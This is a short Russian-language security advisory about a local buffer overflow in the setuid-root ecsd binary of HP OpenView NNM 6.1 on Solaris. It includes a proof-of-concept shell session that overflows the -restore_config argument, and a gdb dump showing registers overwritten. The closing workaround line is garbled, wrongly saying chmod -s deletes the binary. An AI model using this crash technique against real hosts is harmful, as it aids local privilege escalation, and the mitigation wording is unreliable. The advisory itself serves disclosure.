HP OpenView NNM — обеспечивает автоматическое построение карты сети, мониторинг SNMP устройств, позволяет оперативно отслеживать возникновение проблем в сети, быстро определять причины их возникновения и принимать действия для их устранения. Уязвимость в безопасности позволяет локальному злоумышленнику переполнить один из внутренних буферов, используемых в программе. Результатом чего возможно изменение внутреннего стека и последующего исполнения произвольного кода.

Уязвимость наблюдается в HP OpenView NNM v6.1

Пример:

$ uname -a
SunOS OpenView 5.8 Generic_108528-07 sun4u Sparc SUNW, 
UltraSPARC-IIi-Engine
$ ls -la /opt/OV/bin/ecsd
-r-sr-xr-x 1 root bin 2953640 maj 18 11:20 /opt/OV/bin/ecsd
$ pwd /
$ /opt/OV/bin/ecsd -restore_config `perl -e ‘print «A»x312’` Failed to restore engine configuration; 
"//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[snip..]" not found.
$ /opt/OV/bin/ecsd -restore_config `perl -e ‘print «A»x313’` Segmentation fault (core dumped) 
$ gdb /opt/OV/bin/ecsd —core=core [snip..] Core was generated by `/opt/OV/bin/ecsd -restore_config AAAAAAAA[snip..]’. [snip..] #0 0x28eb8 in main ()
(gdb) inf reg 
[snip..]
l1 0x41414141 1094795585
l2 0x41414141 1094795585
l3 0x41414141 1094795585
l4 0x41414141 1094795585
l5 0x41414141 1094795585
l6 0x41414141 1094795585
l7 0x41414141 1094795585
i0 0x41414141 1094795585
i1 0x41414141 1094795585
i2 0x41414141 1094795585
i3 0x41414141 1094795585
i4 0x41414141 1094795585
i5 0x41414141 1094795585
fp 0x41410028 1094778920
[snip..]

Затем запускаем: $ chmod-s/opt/OV/bin/ecsd,это удалит /opt/OV/bin/ecsd, но это не даст возможность получить привилегии администратора.

HP в настоящее время занят решением этой проблемы.



Оставить мнение